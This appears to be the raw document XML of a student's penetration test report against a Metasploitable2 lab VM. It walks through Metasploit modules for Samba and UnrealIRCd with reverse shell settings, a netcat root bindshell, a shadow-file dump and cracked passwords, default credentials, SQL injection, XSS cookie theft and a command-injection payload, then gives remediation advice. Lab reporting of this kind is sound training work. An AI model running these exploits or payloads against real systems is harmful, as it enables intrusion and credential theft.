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PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2 Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pP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Prepared by: VIJAY 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15,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192.168.100.128 (Metasploitable2)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Malleshwaram, Bengaluru - 560003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reachvijays20@gmail.com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linkedin.com/in/vijaycybersecurity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github.com/JacobVijay26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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report presents the findings of a penetration test conducted against Metasploitable2 (IP: 192.168.100.128) on June 15, 2026, performed by VIJAY S using Kali Linux (IP: 192.168.100.129) in an isolated lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete system compromise was achieved through multiple independent attack vectors including network service exploits, web application attacks, and database attacks — all resulting in root-level access.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192.168.100.128 (Metasploitable2)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192.168.100.129 (Kali Linux)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2.6.24-16-server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CVEs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Successful Exploits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root shells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Passwords Cracked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/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Rating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2. Scope &amp; Methodology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2.1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Target: Metasploitable2 (192.168.100.128)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Attacker: Kali Linux (192.168.100.129)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Network: Isolated VMnet1 (192.168.100.0/24)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 type: Black-box penetration test in isolated lab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2.2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Phase 1: Reconnaissance — 4 Nmap scans (basic, version, aggressive, vuln)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Phase 2: Exploitation — Metasploit, Netcat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Phase 3: Post-Exploitation — Credential dumping, password cracking, VNC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Phase 4: Web Application Testing — SQLi, XSS, Command Injection on DVWA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3. Reconnaissance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3.1 Nmap Basic Port Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A basic Nmap scan identified 23 open TCP ports on the target system. All ports represent potential attack surfaces for further exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100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1: Nmap basic scan — 23 open ports on Metasploitable2 (192.168.100.128)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3.2 Open Ports &amp; Services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vsftpd 2.3.4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OpenSSH 4.7p1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Linux telnetd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Apache 2.2.8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139/445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3.0.20-Debian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1099/tcp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 RMI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GNU Classpath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1524/tcp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Bindshell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backdoor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3306/tcp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5.0.51a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5432/tcp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5900/tcp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 3.3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6667/tcp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UnrealIRCd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8180/tcp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Tomcat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Apache 5.5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4. Exploitation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4.1 Samba usermap_script (CVE-2007-2447) — Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba 3.0.20 is vulnerable to command injection via the username field. Exploited using Metasploit to obtain a stable reverse root shell.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 exploit/multi/samba/usermap_script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 RHOSTS 192.168.100.128 / set LHOST 192.168.100.129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 →  uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100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1: Root shell via Samba — uname -a and /etc/passwd dump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4.2 UnrealIRCd Backdoor (CVE-2010-2075) — Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UnrealIRCd 3.2.8.1 contains a trojaned backdoor. Exploited using Metasploit reverse shell payload to obtain root access.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 exploit/unix/irc/unreal_ircd_3281_backdoor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set PAYLOAD cmd/unix/reverse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 →  uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100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2: UnrealIRCd exploit — uname and /etc/passwd confirmed on target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4.3 Port 1524 Bindshell — Instant Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 1524 hosts a pre-installed root bind shell. A single netcat command provides immediate unauthenticated root access.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nc 192.168.100.128 1524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root@metasploitable:/# id  →  uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100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3: Netstat showing all active connections including our exploit shells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5. Post-Exploitation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5.1 /etc/shadow Dump &amp; Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Following root shell access, /etc/shadow was read and transferred to Kali via netcat for offline cracking with John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100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4: /etc/shadow file contents — MD5 hashes extracted from root shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="68580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5: Hashes transferred via netcat and saved to /root/hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685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6: John the Ripper results — 6/7 passwords cracked (sys:batman, klog:123456789, msfadmin:msfadmin, postgres:postgres, user:user, service:service)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5.2 VNC Desktop Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VNC service on port 5900 accessed using default password 'password', providing full GUI desktop control as root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6858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7: TightVNC — full root GUI desktop access on Metasploitable2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6. Database Attacks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6.1 MySQL — No Password Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL 5.0.51a was accessible without any password. Seven databases exposed including dvwa, metasploit, and tikiwiki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="68580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8: MySQL root login with no password — all 7 databases listed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6.2 DVWA Users Table Dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The DVWA database contained 5 user accounts with MD5 password hashes. All 4 unique hashes were cracked instantly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685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9: DVWA users table — 5 accounts with MD5 hashes (password, abc123, charley, letmein)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6.3 Tomcat Manager — Default Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Tomcat 5.5 manager panel accessed using default credentials tomcat:tomcat. Full WAR deployment capability confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100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10: Tomcat Web Application Manager — full admin access with default credentials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7. Web Application Vulnerabilities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7.1 SQL Injection — User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA SQL injection page vulnerable to OR-based injection, dumping all 5 user accounts from the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="68580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11: SQL Injection — OR 1=1 payload dumping all DVWA users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7.2 SQL Injection — UNION SELECT Password Hash Dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION-based injection used to extract password hashes directly from the users table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="68580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12: UNION SELECT injection — all password hashes extracted from DVWA database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7.3 Reflected XSS — Script Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS confirmed on the name input field. JavaScript executed directly in the browser context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6858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13: XSS alert popup confirming JavaScript execution in browser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7.4 XSS — Session Cookie Theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using document.cookie payload to demonstrate session hijacking — full PHPSESSID token exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="68580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14: XSS cookie theft — PHPSESSID=7c321f668c948dcffbb8ca1b32e832e7 captured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7.5 Command Injection — OS Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command injection on the ping function allowed arbitrary OS command execution via semicolon chaining.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="68580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15: Command injection — 127.0.0.1; id showing www-data execution context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7.6 Command Injection — /etc/passwd via Web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Full /etc/passwd contents extracted through the web application command injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685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  <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 16: Command injection dumping /etc/passwd via DVWA web interface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8. Risk Summary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900"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1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vsftpd 2.3.4 Backdoor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CVE-2011-2523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confirmed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Samba usermap_script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CVE-2007-2447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shell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UnrealIRCd Backdoor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CVE-2010-2075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shell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1524 Bindshell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root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No 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DBs dumped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 DVWA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hashes stolen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XSS Reflected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Cookie stolen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/etc/passwd dumped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VNC Weak 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Tomcat Default Creds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POODLE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CVE-2014-3566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 Passwords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10/11 cracked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9. Recommendations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9.1 Critical — Immediate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Remove vsftpd 2.3.4 — upgrade to latest stable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Patch Samba to current stable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Remove UnrealIRCd — replace with non-trojaned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Close port 1524 — remove bindshell service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strong passwords on all MySQL accounts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9.2 High — Short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prepared statements for all SQL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Sanitize all user input — prevent XSS and command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Set HttpOnly and Secure flags on session cookies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Change VNC password to strong unique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Upgrade all services to current stable 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Disable Telnet — use SSH only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9.3 Medium — Long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Deploy Web Application Firewall (WAF)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IDS/IPS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Establish regular patch management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Enforce password complexity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 network segmentation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10. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The penetration test of Metasploitable2 revealed critical vulnerabilities across all attack surfaces. Complete system compromise was achieved through four independent root-level exploits. All major attack categories were demonstrated including network exploitation, credential dumping, password cracking, database attacks, and web application attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The presence of intentional backdoors combined with default credentials, weak passwords, and unpatched services makes this system extremely vulnerable. Immediate remediation is required for any system running similar configurations.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VIJAY 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15,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reachvijays20@gmail.com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linkedin.com/in/vijaycybersecurity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github.com/JacobVijay26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Malleshwaram, Bengaluru - 560003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20153fcef8e3a26736b9a2645178bb25b62870.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1f7b19a879414d7da2132945f13e2fe9048dc9ec.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9c1cf859552eda1107d8f1bbeaf99592f458d3df.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/26e88bb9d09a1e8b56b0dc8b02293c803b6c0d5b.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a14074b5e64081fed6cba250a8c68352a1799067.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/13841b2638d896e753bf2141bf059b57a863a02e.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/2ac0a4ea4a005757f10ffad4b2a7eb499e0e833a.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3535b2687efb056c4eb5f422ce5a7bab830332ff.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cfdecb632957c9019ec1453766cfc094b5a1a595.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8a2505f507c076995641bcc1c41b4c4220db5052.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a7a5d1f6ccc54bf8e712b199e7a2845b242a5fe7.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a8d8ec84bb64dedf6ad8feb80553339cb2659c18.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/910330ff53abf13e01ac93d83bf1b024026014f2.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/a5b08b7b1ed521218c300227be7cdc72edb17044.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7fd284fbfef283d299b10a96d5dc63554309e801.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4e3bd2d4d544b68e3b1b218d584f913d178c887c.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/604df74dbb83c1fc5be6d405badfa7c90cf99e8b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2026-06-16T14:38:08.177Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-16T14:38:08.189Z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